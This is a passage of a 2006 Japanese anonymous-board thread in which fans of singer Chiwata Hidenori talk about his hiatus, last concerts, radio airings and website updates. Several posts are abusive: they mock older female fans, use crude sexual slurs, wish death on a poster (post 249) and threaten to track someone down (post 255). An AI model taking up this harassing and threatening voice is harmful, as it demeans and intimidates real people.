ね〜、変なの貼り付けられてここ来る気無くなっちゃったの?
最近静かだね。AXのFC先行も届き始めたというのに‥。

141 :NO MUSIC NO NAME:2006/07/12(水) 23:15:02 ID:1cHFfqyQ
来たかったけど、来れなかったの。
変なの貼るなよー。

142 :NO MUSIC NO NAME:2006/07/15(土) 18:41:44 ID:S7DmTWVO
50ほどログ流しすれば?
そうすれば最新50表示で被害無いでしょ

143 :NO MUSIC NO NAME:2006/07/16(日) 06:49:51 ID:k5fMPE4J
そなんだ…それじゃ、がんばって書き込み。
大阪行く人います?自分行けないので、感想お願いします。

144 :NO MUSIC NO NAME:2006/07/16(日) 11:31:44 ID:jfhnGmb1
>142
ということは

145 :NO MUSIC NO NAME:2006/07/16(日) 11:32:19 ID:jfhnGmb1
186になるまで

146 :NO MUSIC NO NAME:2006/07/16(日) 11:32:51 ID:jfhnGmb1
カキコせにゃ


147 :NO MUSIC NO NAME:2006/07/16(日) 11:33:50 ID:jfhnGmb1
フェドアウトせんのか

148 :NO MUSIC NO NAME:2006/07/16(日) 11:34:21 ID:jfhnGmb1
長いな〜

149 :NO MUSIC NO NAME:2006/07/16(日) 11:35:43 ID:jfhnGmb1
と、ムダに連投してみる。

150 :NO MUSIC NO NAME:2006/07/16(日) 16:36:22 ID:YWgbd05l


151 :NO MUSIC NO NAME:2006/07/16(日) 22:08:02 ID:k5fMPE4J
明日は夏音。

152 :NO MUSIC NO NAME:2006/07/17(月) 01:12:58 ID:6YP4VA2L
ちくわ

153 :NO MUSIC NO NAME:2006/07/17(月) 18:36:27 ID:WLxP4LdZ
わさび

154 :NO MUSIC NO NAME:2006/07/18(火) 13:14:22 ID:3/cl9q6F
今日はBIG CAT。

155 :NO MUSIC NO NAME:2006/07/18(火) 13:18:38 ID:3/cl9q6F
夏音、前の唄会に続いてまた新曲らしきものを聴かせてくれたようだね。

156 :NO MUSIC NO NAME:2006/07/18(火) 17:52:25 ID:kOJhpLWF
 うむ。

157 :NO MUSIC NO NAME:2006/07/18(火) 17:52:50 ID:hf7EDGM9
うむうむ。

158 :NO MUSIC NO NAME:2006/07/18(火) 23:33:13 ID:3/cl9q6F
大阪も終わったね。

159 :NO MUSIC NO NAME:2006/07/18(火) 23:34:58 ID:3/cl9q6F
あとは最終幕と花火大会か…。

160 :NO MUSIC NO NAME:2006/07/20(木) 03:34:08 ID:uOJfjOmn
花火大会、マイカー組以外は帰りの足がないのはガイシュツ?

161 :NO MUSIC NO NAME:2006/07/20(木) 07:49:18 ID:RMiEpzY9
 

162 :NO MUSIC NO NAME:2006/07/20(木) 14:12:48 ID:pp0++NZV
>160
花火大会行く人の発言は今のところ無いです。

163 :NO MUSIC NO NAME:2006/07/20(木) 22:49:55 ID:LW3k/WD6
大阪よかったよ。AXもよさそう。
新曲の「今、君を」26日のFABの方が好きかも?
大阪では歌詞がそぎ落とされていて、インパクトが増していた。
でも、代わりに感情が乗り切れなくなってたような…。
前半は大阪ver.で後半は三回言い切るFABver.の方がいいな。
どこに納まりがつくのか楽しみだ。
「証」は全然歌詞覚えられなかったけれど、感情の蓋が全開になった。
予定の立ってるライブが後2回しかないって…哀しくてやりきれなくなった。
止められるものなら時間止められたらって思ってたから。よけいかな。
約束できないけど待っててってずるいよ(笑)
待っててより「すぐに逢えるよ」って言って欲しいな…。

164 :NO MUSIC NO NAME:2006/07/20(木) 23:29:46 ID:pp0++NZV
>163
情報ありがと。「今、君を」AXでまたヴァージョンが変わるかな?


165 :NO MUSIC NO NAME:2006/07/20(木) 23:31:18 ID:pp0++NZV
にしても

166 :NO MUSIC NO NAME:2006/07/20(木) 23:32:54 ID:pp0++NZV
早く136のカキコの

167 :NO MUSIC NO NAME:2006/07/20(木) 23:34:01 ID:pp0++NZV
影響を逃れたい

168 :NO MUSIC NO NAME:2006/07/21(金) 07:18:47 ID:r5tUb0el
それには、書き込むのみ?


169 :NO MUSIC NO NAME:2006/07/21(金) 07:23:57 ID:r5tUb0el
あと、18レス。


170 :NO MUSIC NO NAME:2006/07/21(金) 07:25:46 ID:r5tUb0el
と、無駄に連投。

171 :NO MUSIC NO NAME:2006/07/21(金) 10:05:43 ID:vbfZ4bTF
シリア語uzeeeeeeeeeeeeeeeeeeeeeee

172 :NO MUSIC NO NAME:2006/07/21(金) 10:06:04 ID:A4Zc94zO
 

173 :NO MUSIC NO NAME:2006/07/21(金) 10:06:18 ID:Xe4GGV0j
 

174 :NO MUSIC NO NAME:2006/07/21(金) 22:36:09 ID:xZuUQ9DB
もう明日なんだね…

175 :NO MUSIC NO NAME:2006/07/22(土) 21:23:58 ID:hPq8ZmeY
 

176 :NO MUSIC NO NAME:2006/07/22(土) 21:24:29 ID:hPq8ZmeY
 

177 :NO MUSIC NO NAME:2006/07/22(土) 21:24:51 ID:DkTNUbGj
 

178 :NO MUSIC NO NAME:2006/07/22(土) 21:25:09 ID:uoD3G+Op
 

179 :NO MUSIC NO NAME:2006/07/22(土) 21:25:22 ID:EyYUIUnU
 

180 :NO MUSIC NO NAME:2006/07/22(土) 21:25:40 ID:/YVg2ujb
 

181 :NO MUSIC NO NAME:2006/07/22(土) 21:25:52 ID:boz9Tqj2
 

182 :NO MUSIC NO NAME:2006/07/22(土) 21:26:05 ID:j1ZYNmz9
 

183 :NO MUSIC NO NAME:2006/07/22(土) 21:26:21 ID:IVhFGRt6
 

184 :NO MUSIC NO NAME:2006/07/22(土) 21:26:35 ID:wJnJHCKh
 

185 :NO MUSIC NO NAME:2006/07/22(土) 21:26:53 ID:+eOfV3eu
 

186 :NO MUSIC NO NAME:2006/07/22(土) 21:27:07 ID:mzsMX47D
 

187 :NO MUSIC NO NAME:2006/07/22(土) 21:28:00 ID:mzsMX47D
 

188 :NO MUSIC NO NAME:2006/07/24(月) 18:14:29 ID:DyIXwwoE
もう、ブラクラの影響はないのかにゃ?
AX楽しかったね。

189 :NO MUSIC NO NAME:2006/07/25(火) 13:30:48 ID:3/n2WXso
祝・影響脱出、みなさんお疲れ。そしてAX行った人も。

190 :NO MUSIC NO NAME:2006/07/25(火) 13:32:42 ID:Dgm8xiWl
 

191 :NO MUSIC NO NAME:2006/07/26(水) 07:10:55 ID:YLPTOqan
「あっと…」がカメラまわしてたね。恒例のお盆に特盛してくれたらいいな。
AXのDVDが販売されたら、とっても、とっても、うれしいのだけど…

192 :NO MUSIC NO NAME:2006/07/26(水) 07:15:05 ID:YLPTOqan
オフィ、8/1より「一時」閉鎖の千綿よりお知らせ有り。
淋しいね。早く、戻っておいでねぇー。

193 :NO MUSIC NO NAME:2006/07/26(水) 20:12:30 ID:ot7ypZT0
2階関係者席の中央で、マネが見てたよ〜。
声をかけたかったけど、騒ぎになると困るからやめておきました。

194 :NO MUSIC NO NAME:2006/07/27(木) 09:53:19 ID:h/YkEx6S
声かけたいて 肝

195 :NO MUSIC NO NAME:2006/07/27(木) 23:29:27 ID:Z4g9tE4H
騒ぎになるもなにも
過去の人だ

196 :NO MUSIC NO NAME:2006/07/31(月) 15:07:28 ID:BXG1HGt8
公式今日までだね。0時になったらもう見られないのかな?

197 :NO MUSIC NO NAME:2006/08/02(水) 00:46:58 ID:MeQGXODX
songsのHPのアーティスト紹介の文章にほろりときた…
ttp://songs.jp/artist/chiwata/index.html

198 :NO MUSIC NO NAME:2006/08/02(水) 05:21:25 ID:hYrEUSHu
サムエルも解散だって。MCで千綿を気遣ってくれていい人たちだなぁ…
と思っていたのに残念。千綿も袖で準備しながらも、結構一生懸命にステージ
見ていたな。知っていたのかな?

199 :NO MUSIC NO NAME:2006/08/02(水) 21:31:19 ID:MeQGXODX
…なんだか最近、解散ネタ多いね…。さみしいね。
あっとのHPもリニューアルしたけど千綿チャンネルが残っていてほっとした。
さみしさ紛らわすのに見てよ…。

200 :NO MUSIC NO NAME:2006/08/03(木) 14:30:32 ID:gpZiIX59
>199

あっとのブックマーク、削除しようと思っていたところだった。
ありがとさん。セーフ…。

201 :NO MUSIC NO NAME:2006/08/04(金) 22:27:49 ID:obliBHKa
面白いもの発見
ttp://www.youtube.com/watch?v=gOnQgHXnptc&search=kasabuta
カサブタのOP
ttp://www.youtube.com/watch?v=4LGl3xuzUWc&search=re%3Amember
ナルトのOPとの合成、でもなぜかバッチリ。

202 :NO MUSIC NO NAME:2006/08/09(水) 00:06:46 ID:FLu/2RbY
見たよ〜。場面転換のタイミングもほぼバッチリだったね。
面白かったよ。ナルトのOPは知らないけど、同じような
アップテンポの曲なのかな?でなきゃこんなに合わないと思う。

203 :NO MUSIC NO NAME:2006/08/11(金) 15:45:01 ID:CHzUXClW
公式HP更新。暑中見舞い程度の短いメッセージだけど、もう見た?

204 :NO MUSIC NO NAME:2006/08/12(土) 09:29:21 ID:H+WTONJm
見た見た!また更新されてたよ!
ちょこちょこ様子を知らせてくれるのは嬉しいね。
映画楽しみだな〜。

205 :NO MUSIC NO NAME:2006/08/13(日) 07:40:23 ID:9MJdHEC8
うん。何だか覗くのが楽しみ。
今日KBC(九州朝日ラジオ)夜10:00〜11:00まで玄海町ライブOA
AM波なので、頑張って聞いてみてね。
ちなみに、福岡1413、北九州720、大牟田、行橋1485だそうです。

206 :NO MUSIC NO NAME:2006/08/13(日) 11:46:30 ID:8VFZTV0J
聴きた〜い!1、2曲かかるのかな?入るかな??

207 :NO MUSIC NO NAME:2006/08/14(月) 21:43:13 ID:WtPmPedQ
ラジオどうでした?なにがかかったの?

208 :NO MUSIC NO NAME:2006/08/15(火) 07:17:02 ID:+CTMFD0g
>207
カサブタ、愛のカケラ、友よ、枯れない花。がOAされたらしいよ。

209 :NO MUSIC NO NAME:2006/08/15(火) 21:25:43 ID:Ew6iifUq
>208
ありがとう。いっぱいかかったんだね。いいな。
「枯れない花」聴きたいな。

210 :NO MUSIC NO NAME:2006/08/16(水) 06:59:11 ID:cMzkEQZb
「友よ」では「唄うかい!」という千綿の掛け声と一緒に、会場も歌いだし
ライブ感が増してた。「枯れない花」でも千綿のアカペラと会場のコーラスが
聞こえて、あぁ、ラストライブなんだな…って感じでした。

211 :NO MUSIC NO NAME:2006/08/17(木) 21:26:07 ID:Hy5BI28d
いいなー聴きたーい。ライブで聴きたいねー。
さみしいの紛らわすのに、
PCつけたら壁紙状にメッセージのページを使ってる。
こまめに更新してくれて嬉しいねぇ。

212 :NO MUSIC NO NAME:2006/08/19(土) 11:08:08 ID:3irS2fgv
ここ平均年齢50近くない?

213 :NO MUSIC NO NAME:2006/08/19(土) 16:39:05 ID:RjgCOan9
FC会報では、リニューアル後は千綿のブログを中心に運営して
行く予定と書かれていたけど、もう準備号的な内容になってる。
リニューアルしたら、ブログにコメントできるようになるのかな?


214 :NO MUSIC NO NAME:2006/08/19(土) 19:51:35 ID:U2HCMe4W
ブログ楽しみだね。コメント!?できるのかな?
できたらできたで大変そうだけど…いろいろな意味で…。
リニューアルしたHPって、どんな感じになるんだろうね。
待ち遠しいな。

215 :NO MUSIC NO NAME:2006/08/20(日) 00:28:50 ID:gEvjoVmt
活動休止と言いつつ
頻繁にお知らせしてる カッコワル

216 :NO MUSIC NO NAME:2006/08/20(日) 00:45:09 ID:ALjX9jYV
夜ピクは原作を読んでから映画を見た方がいいのか?
映画見てから原作読んだ方がいいのか?どっちかな?
原作ある映画モノって順番を間違えると、えらい目に合うことがある…。

217 :NO MUSIC NO NAME:2006/08/20(日) 02:05:56 ID:bTv/OrR5
単純な話だから映画からでいいと思われ

218 :NO MUSIC NO NAME:2006/08/20(日) 20:41:14 ID:ALjX9jYV
>217
ありがとう。映画見てからにするよ。

219 :NO MUSIC NO NAME:2006/08/20(日) 23:35:03 ID:dZjBhCTP
>216
>原作ある映画モノって順番を間違えると、えらい目に合うことがある…。

わかるな〜それ。うちのダンナも「ローレライ」を原作の後に映画の
順番で見たら「ずいぶん乱暴に縮めてあるな〜。原作知らない人間は
あれ見て消化できるのか…?」なんて言ってた。「指輪物語」は
原作知ってる私でも、よくまとめていたと思う。



220 :NO MUSIC NO NAME:2006/08/21(月) 00:06:10 ID:bTv/OrR5
あんたの旦那の話や脳みそが固くて理解できない話は書かなくていい
やっぱここは年齢層高そうだな

221 :NO MUSIC NO NAME:2006/08/21(月) 06:39:17 ID:C+6VmQkL
デスノートも賛否両論だね。

222 :NO MUSIC NO NAME:2006/08/30(水) 21:55:11 ID:1hFbVGet
公式アップされたね。お休みから一ヶ月。ある意味、風邪も安心して引ける?
ようになったのかなぁ…でも、元気でいておくれね。

223 :NO MUSIC NO NAME:2006/08/31(木) 17:56:09 ID:51VxxtQp
某ブログに目撃情報がアップされてたけど消えたね

224 :NO MUSIC NO NAME:2006/09/01(金) 01:24:37 ID:04N7upYa
songsのアーティスト情報がAX以降に書きかえられてるよ。

225 :NO MUSIC NO NAME:2006/09/04(月) 22:59:16 ID:2343jKcW
rain

226 :NO MUSIC NO NAME:2006/09/07(木) 21:26:45 ID:YFLBjw/X
今日は満月が綺麗だね。秋の夜空だなぁ。

227 :NO MUSIC NO NAME:2006/09/08(金) 10:08:59 ID:gm0fmVx5
女性は月を眺めてはいけないのをご存じない?
月に向かって称賛の言葉を投げ掛ける度、女性は良縁を断ち切り悪縁を結びます
千綿ファンには月好きが多いのも頷けますね

228 :NO MUSIC NO NAME:2006/09/09(土) 13:09:32 ID:hSLxVCC2
ネタが無い…。次の公式の更新はいつかなぁ……。

229 :NO MUSIC NO NAME:2006/09/09(土) 16:37:30 ID:84Zv1px9
千綿、文化祭でたネタ

230 :NO MUSIC NO NAME:2006/09/09(土) 17:04:56 ID:JwqRAKR2
文化祭でカサブタと逢えない夜と友よを演奏。
飛び入りで。
ギターは持ってきてなかったけど知り合いに電話して持ってきてもらったらしい。
高校時代の話も曲と曲の間で話された。


231 :NO MUSIC NO NAME:2006/09/10(日) 00:08:12 ID:F/ncqOfr
>230
文化祭にいかれたんですね。
誰でも行けたの??うらやましいです。
どんな話が出たんですか?


232 :NO MUSIC NO NAME:2006/09/10(日) 04:22:24 ID:3aHOYLJD
きもい

233 :NO MUSIC NO NAME:2006/09/16(土) 11:57:24 ID:Bq0e7YGv
夜ピクの文庫本の宣伝があちこちで目につく。
映画もブレイクしないかな?
逢えない〜もブレイクするといいな。
Mステでタモリと九州トークとか見たいな。

234 :NO MUSIC NO NAME:2006/09/16(土) 22:37:29 ID:mktFQcvz
ブレイクするわけない 夢見るおばさんはこれだからな

235 :NO MUSIC NO NAME:2006/09/16(土) 23:04:38 ID:4VwLflcA
夜ピク公開まであと二週間。千綿本人は映画館に足運ぶのかな?
初日舞台挨拶でご登場…なんてあるわきゃ無い……。

236 :NO MUSIC NO NAME:2006/09/17(日) 09:25:35 ID:SRPMGKmC
試写会で見たってHPに書いてあったから行かないかも?
エキストラで出演?してくれてたら見る楽しみも増えるのにね。
高校が舞台じゃ無理だねw

237 :NO MUSIC NO NAME:2006/09/17(日) 09:28:18 ID:SRPMGKmC
試写会で見たってHPに書いてあったから行かないかも?
エキストラで出演?してくれてたら見る楽しみも増えるのにね。
高校が舞台じゃ無理だねw

238 :NO MUSIC NO NAME:2006/09/18(月) 16:04:25 ID:KZoEjwB/
見たのは試写会ではないとオモ
それよりShortCakeDVD発売のイベの方が ムニヤムニャ

239 :NO MUSIC NO NAME:2006/09/18(月) 18:57:26 ID:AxaMuy5T
え〜?ShortCakeDVD発売イベって期待していいの?

240 :NO MUSIC NO NAME:2006/09/19(火) 23:18:48 ID:1uJiQsTb
公式更新。3月にはムク、その半年後にはばあちゃん。今年は
千綿にとって激動の年なのか…


241 :NO MUSIC NO NAME:2006/09/20(水) 00:06:17 ID:bTBhkI1Y
激動というか、試練って感じ。

242 :NO MUSIC NO NAME:2006/09/20(水) 11:43:25 ID:4MQqYJPc
大殺界

243 :NO MUSIC NO NAME:2006/09/20(水) 21:58:11 ID:MTCb7XEf
夜ピクのCDでたねー!

244 :NO MUSIC NO NAME:2006/09/21(木) 17:44:16 ID:jxPehMKR
なんか、夜明けのシーンで流れるらしいね。「逢えない夜を越えて」
夜ピクのスレで試写を見てきた人が言ってた。

245 :NO MUSIC NO NAME:2006/09/21(木) 21:07:27 ID:rZ8YcOF5
夜明けのシーンにぴったりだね。
原作読んだけど、読んでから見ても大丈夫そうよ?
心の表情がより分かっていいかも?
男が受身なのは今の流行りかねぇ。

246 :NO MUSIC NO NAME:2006/09/21(木) 22:23:52 ID:QcHTmohv
おしつけがましいな

247 :NO MUSIC NO NAME:2006/09/21(木) 23:17:38 ID:osCDVuP2
>245

ま、とりあえず読まずに行ってみます。どっちが先でもOKそうですね。

248 :NO MUSIC NO NAME:2006/09/22(金) 00:07:23 ID:lhtbEduY
もうさ、千綿絡みのどこのサイト、ブログにもさ、否定的なヴァカおるやろ?
千綿ヒデノリ好かんとやったら来んなよ!せからしか!
好いたモンだけ集まりゃ良かろうが?
不平不満とか、否定したか奴はよそにスレ立ててからせろよ!!

249 :NO MUSIC NO NAME:2006/09/22(金) 00:23:08 ID:/7e2ZAIi
きもいな おまえ●ぬよ

250 :NO MUSIC NO NAME:2006/09/22(金) 00:23:27 ID:Ewwt27kD
http://pr4.cgiboy.com/S/6498643/
ヒデの生まれ変わりだとか言ってる!!ムカツク!!!




251 :NO MUSIC NO NAME:2006/09/22(金) 13:05:35 ID:lhtbEduY
249≪出て行けカスタレ(笑)

否定的な奴は来るなよっつてんだろがよ!(笑)

252 :NO MUSIC NO NAME:2006/09/22(金) 13:06:19 ID:lhtbEduY
249≪出て行けカスタレ(笑)

否定的な奴は来るなよっつてんだろがよ!(笑)

253 :NO MUSIC NO NAME:2006/09/22(金) 15:02:23 ID:/7e2ZAIi
きもいな 千綿ヲタクオリティ

254 :NO MUSIC NO NAME:2006/09/22(金) 20:56:25 ID:09Ha6feG
「郷に入れば郷に従え」で、2ちゃんではそういうのは「スルー」となってる。
ここじゃ否定してても本人の前じゃ満面の笑顔かもよ?
って感じの相手を喜ばせるだけだから。スルーしな。
肯定的な話をする方が萎縮しなきゃ問題ないない。


255 :NO MUSIC NO NAME:2006/09/23(土) 07:07:09 ID:aqWUUAhD
今、すっげー気分わりいからよ、253に言っとく。

チンカス!顔見えんからって吠えとったら貴様そのうち狩るからな!


どうにかして尻尾掴むからな!




以上、これからはどんなくっされチンカスが現れようと知らねぇ。



ヴォケが!
オ○ニーして寝れば?
チンカスが!

256 :NO MUSIC NO NAME:2006/09/23(土) 10:41:29 ID:tfP876C5
ttp://019.gamushara.net/tv/data/baka_1.jpg

257 :NO MUSIC NO NAME:2006/09/23(土) 12:22:53 ID:LbV7dyLm
千綿ヲタクオリティの再下部がいるね

258 :NO MUSIC NO NAME:2006/09/23(土) 21:51:33 ID:aKT+Y9ft
夜ピク本とダブルで宣伝結構してるね〜。
yahooとかでも特集になってるし。
う〜ん。期待したいな。

259 :NO MUSIC NO NAME:2006/09/24(日) 00:30:19 ID:g1E7ENcp
久々に真性馬鹿を見たなぁ。
狩る?尻尾掴む?
犯罪予告キタコレw
そのクオリティ、恐れ入ったよww
あ〜怖い怖いwww

260 :NO MUSIC NO NAME:2006/09/24(日) 14:09:02 ID:7iK+9pFN
夜ピクTVでCM流れてた。

261 :NO MUSIC NO NAME:2006/09/25(月) 19:32:54 ID:51hAqdRK
見た!見た!

262 :NO MUSIC NO NAME:2006/09/25(月) 21:49:49 ID:9A+VUDiu
「Short Cakes」も発売されたよ!

263 :NO MUSIC NO NAME:2006/09/26(火) 21:55:14 ID:BXOpX1Wy
どしゃ降りでずぶぬれになった。
「傘がない」でも聴こうか。

264 :NO MUSIC NO NAME:2006/09/26(火) 22:51:22 ID:0y95a5z0
そうやって自分語りしたがるのは加齢のせいですね

265 :NO MUSIC NO NAME:2006/09/27(水) 20:34:58 ID:fgilS6F8
「Short Cakes」のイベント千綿来るのかな?

266 :NO MUSIC NO NAME:2006/09/28(木) 00:53:05 ID:qgYfTO8q
来ない

267 :NO MUSIC NO NAME:2006/09/29(金) 08:59:14 ID:+GlkCebM
夜ピクのyahooライブトークが今日あるよ!

268 :NO MUSIC NO NAME:2006/10/01(日) 22:31:31 ID:9oOtS00c
「short cakes」発売イベ行った人いる?
千綿はいた?

269 :NO MUSIC NO NAME:2006/10/02(月) 00:18:22 ID:NmVdBQ5h
出ませんでしたが来てたかは知りません

270 :NO MUSIC NO NAME:2006/10/02(月) 00:47:15 ID:3fWUqwd6
>269
行ってきたんだ?お疲れさま〜。

271 :NO MUSIC NO NAME:2006/10/02(月) 16:32:53 ID:TMjK8Nv8
キャンプ苦手な自分。
自然児になれる千綿がうらやましい…
次から四万十川ヒデノリ名乗ったりしてね。


272 :NO MUSIC NO NAME:2006/10/02(月) 19:10:43 ID:NmVdBQ5h
くだらん

273 :NO MUSIC NO NAME:2006/10/02(月) 19:46:20 ID:yraJfQAo
すごく楽しそうな笑顔がいいね。
星も綺麗だったんだろうな。


274 :NO MUSIC NO NAME:2006/10/05(木) 09:37:07 ID:e2nqXjQs
そろそろ貯金も少なくなってきた頃だから、小銭稼ぎをする時期

275 :NO MUSIC NO NAME:2006/10/06(金) 02:22:02 ID:Fdi7SVhj
今更気付いたのだが、禁煙は強制終了?
葉巻吸っているんだね。

276 :NO MUSIC NO NAME:2006/10/06(金) 06:45:13 ID:96K4nXae
いいメロディが生まれたってどんなのかな?楽しみ。
「今、君を」唄力のおかげ様でちゃんと焼きついてる。


277 :NO MUSIC NO NAME:2006/10/06(金) 08:37:15 ID:S/5r1TnH
ヲタ様達に生気吸い取られない幸せな日々

278 :NO MUSIC NO NAME:2006/10/06(金) 14:17:38 ID:ktcAuo4c
↑ププッ

ププッ!

アハハッ!

ドライ ブッテル シンセイ オタWWW
キツイナァWWW┐('〜`;)┌WWW
ウチラハ チガウ トカ アピッテンノ?WWW
WWWマァ セイゼイ カッコバッカ ツケトレャWWW

279 :NO MUSIC NO NAME:2006/10/07(土) 01:22:48 ID:zR4UTOq+
↑ズバリイワレタノガクヤシカッタノネWWW

CDナンマイモッテンノ?





280 :NO MUSIC NO NAME:2006/10/07(土) 13:18:02 ID:RIrgmsBf
長澤監督が「逢えない〜」のPV創ったらどうなるんだろ?
見たいな〜。

281 :NO MUSIC NO NAME:2006/10/07(土) 17:42:54 ID:HdjyI6sd
おばさん 夢見すぎ

282 :NO MUSIC NO NAME:2006/10/08(日) 00:54:19 ID:/qGpUM+h
>276
そのメロディーが披露される日が来るといいな。

283 :NO MUSIC NO NAME:2006/10/09(月) 03:36:53 ID:chRr9S9U
自分にレスて 爆ワラ

284 :NO MUSIC NO NAME:2006/10/09(月) 03:42:03 ID:PudUa/Zr
おい!!

みんな!!しこってないで、このサイト見ろよ!!
ttp://www.geocities.jp/luitles/

ソロでがんばってるアーティストのhpだぜ!!www

みんなで盛り上げようぜ!!www
ttp://www.geocities.jp/luitles/




285 :NO MUSIC NO NAME:2006/10/09(月) 23:56:18 ID:2pv/4jW9
>282
待ち遠しいよ〜。音源だけでも手紙みたいに届けてくれると嬉しいなぁ。

286 :NO MUSIC NO NAME:2006/10/10(火) 03:04:53 ID:+qmaEqk9
おねだりはよくない
生い先短い人はこれだから困る
ゆっくり休めないような事をわかって言ってるのね?

287 :NO MUSIC NO NAME:2006/10/10(火) 06:40:12 ID:YFyp76RU
ただのボヤキさ…………。

288 :NO MUSIC NO NAME:2006/10/10(火) 08:32:34 ID:oTFK74FU
そのぼやきが重いんだよ

289 :NO MUSIC NO NAME:2006/10/10(火) 20:54:02 ID:ogTSaS8/
この程度のことでゆっくり休めない程ひ弱なのかw
無菌室か無人島に閉じ込めたら満足か?

290 :NO MUSIC NO NAME:2006/10/10(火) 21:56:25 ID:+qmaEqk9
おばさんはこれだから
自分の厚かましさの幅が違うんだな
千綿の復活はまだまだな予感
おばさん、いい加減、千綿を所有物扱いするのはやめてね

291 :NO MUSIC NO NAME:2006/10/10(火) 23:38:11 ID:0J+afKKl
本人にメール送りつけるならともかく、ここでの独り言くらい
大目に見たれよ。

292 :NO MUSIC NO NAME:2006/10/10(火) 23:57:51 ID:+qmaEqk9
おばさんのひとりごと主張が強すぎね?

293 :NO MUSIC NO NAME:2006/10/12(木) 06:42:52 ID:47auoiCa
別の角度の見方を受け入れなかったり、自分の意見が絶対みたな人にって
周りが何にも言わなくなるんだよな。好きにさせとくのが無難だから。
お局&姑体質に年齢は関係ないなあ。

294 :NO MUSIC NO NAME:2006/10/12(木) 08:31:48 ID:ILxuW5uQ
偉そうに評論してる馬鹿じゃま。
チラ裏してろ。

295 :NO MUSIC NO NAME:2006/10/12(木) 14:17:22 ID:utywbP09
水洗花とMはキャラかぶりだよね
で、どっちよ?

296 :NO MUSIC NO NAME:2006/10/12(木) 22:01:04 ID:QNNAIT+v
公式更新。

297 :NO MUSIC NO NAME:2006/10/12(木) 22:39:54 ID:VfV9919D
カッコイイネー!雰囲気が良いサイトになっているね。

298 :NO MUSIC NO NAME:2006/10/13(金) 03:59:25 ID:wC+E1ix1
赤心がブログで語ってたきれいに撮ってくれてありがとうと千綿に言われた写真か ワラ

299 :NO MUSIC NO NAME:2006/10/13(金) 09:55:40 ID:gEA1dP15

    ∧_∧
    ミ ´∀`ミ      / ̄ ̄ ̄ ̄ ̄
     )"  (_   <  千綿AAできたよ〜
   ∠     ハ    \_____
   /       | \
  / /"__   |\ \
  ヽ__ ̄ ̄⌒)  ̄\\ \   。。。
    || ̄||三三● )三m三三Ε∃
    \_.へ__イ      ゚ ゚ ゚
     .|""'''''"   \
      |  /⌒\ .\
     ノ  |    >  )
    /  ノ   /\/
   /  /   / /
   |─./   (  ヽ、
   |  .|    ヽ、_つ
    、_つ



300 :NO MUSIC NO NAME:2006/10/14(土) 00:20:34 ID:on9fmNeq
>299
千綿はもちょっと足長いと思う

301 :NO MUSIC NO NAME:2006/10/18(水) 23:50:47 ID:XoPHKgJV
公式が形になってきたね。プロファイルの写真もいい感じだね。
コメントにぐっときた。更新が多くて嬉しい。

302 :NO MUSIC NO NAME:2006/10/19(木) 00:17:05 ID:ysk6pRu9
プロファイル?

303 :NO MUSIC NO NAME:2006/10/19(木) 13:38:51 ID:SG0pr1YU
プロフィールと読む人がほとんどじゃない?



304 :NO MUSIC NO NAME:2006/10/21(土) 09:25:59 ID:W5pgzIbD
プロファイル w

305 :NO MUSIC NO NAME:2006/10/21(土) 17:04:07 ID:YMUOGuxf
プリファイルww

306 :NO MUSIC NO NAME:2006/10/23(月) 14:55:20 ID:LkW5+0xb
プロファイル

307 :NO MUSIC NO NAME:2006/10/31(火) 22:37:31 ID:Na/Tv9Us
もう11月だね。今年ももうすぐ終わるね。

308 :NO MUSIC NO NAME:2006/10/31(火) 23:28:27 ID:X/9XAtRr
プロファイル巡回ごくろう

309 :NO MUSIC NO NAME:2006/11/02(木) 03:58:43 ID:uddacOEW
リアルタイム見物アゲ

310 :NO MUSIC NO NAME:2006/11/02(木) 22:49:07 ID:JVcsOgw+
野良猫の平均寿命は飼い猫の半分以下なんだよね

311 :NO MUSIC NO NAME:2006/11/03(金) 01:57:30 ID:Z3zI1iBX
そういうとこに食い付いてるプロファイル

312 :NO MUSIC NO NAME:2006/11/03(金) 10:29:53 ID:u9J6ePHv
お局&姑クオリティは健在。
揚げ足とりほどほどにしないと己の教養問われるよw

313 :NO MUSIC NO NAME:2006/11/03(金) 14:51:17 ID:BJWgHsHN
公式、インフォメーションがクリックできるようになったけど
情報は何もナシ。当然っちゃあ当然だけど…。
ディスコグラフィーが依然クリックできんけど、SONYどころか
cocoroから出したCDも、権利の問題とかで載せられないのか?

314 :NO MUSIC NO NAME:2006/11/03(金) 16:40:15 ID:Z3zI1iBX
プロファイル恥ずかしいね

315 :NO MUSIC NO NAME:2006/11/03(金) 17:40:49 ID:8Gcm8/8x
そのネタはもう秋田

316 :NO MUSIC NO NAME:2006/11/04(土) 09:17:54 ID:c3KrtW0n
食いつきがH以下

317 :NO MUSIC NO NAME:2006/11/06(月) 00:34:45 ID:SHTCDAUW
ジャケ写は権利が絡むかもしれないけれども…。
CDの名前や商品番号とかだけでも載せて欲しいね。

318 :NO MUSIC NO NAME:2006/11/06(月) 13:56:52 ID:oJdU0qx2
Mさん必死

319 :NO MUSIC NO NAME:2006/11/07(火) 18:44:32 ID:WV+ntEFu
Z氏情報求む

320 :NO MUSIC NO NAME:2006/11/08(水) 00:22:45 ID:Y8M+m8ke
お気に入りの場所っていいね〜。
人にはどうってことない場所でも、自分には特別な場所。
明日は遠回りしてお月見でもして帰るかな〜。秋だな〜。

321 :NO MUSIC NO NAME:2006/11/08(水) 03:09:49 ID:8ZnMQmnF
自分語りはご自身のブログでどうぞ


ブログに歌詞丸写ししてるアトピー不気味

322 :NO MUSIC NO NAME:2006/11/09(木) 21:10:49 ID:ZARc+wSd
>319
月見ル君想フで仕事中?

323 :NO MUSIC NO NAME:2006/11/09(木) 23:01:12 ID:W6qRVTWw
千綿ファンでI'S CUBEのファンってヤシ?

324 :NO MUSIC NO NAME:2006/11/10(金) 01:34:00 ID:py/YPvJm
杵ヲタでもある

325 :NO MUSIC NO NAME:2006/11/11(土) 16:53:37 ID:5uAdZy2+
軍団ブログには肖像権も著作権も通じない

326 :NO MUSIC NO NAME:2006/11/15(水) 07:50:15 ID:UKMXfroB
佐賀高校総体。それだけのために佐賀に飛ぶ時間も金も無い…。


327 :NO MUSIC NO NAME:2006/11/15(水) 13:41:10 ID:ASUr7Ntz
千綿に会えるかもよ ワラ

328 :NO MUSIC NO NAME:2006/11/15(水) 21:36:03 ID:dgs31vUe
いや〜贅沢の極みだよ。
佐賀の高校生が羨ましい。

329 :NO MUSIC NO NAME:2006/11/15(水) 23:00:31 ID:oUiKoVre
復帰第一作、千綿偉功最初の仕事が佐賀高校総体300日前推進大会テーマ曲って…、びみょお…。でもファン層が生徒の保護者たちと同世代だから、それも有りなのか。
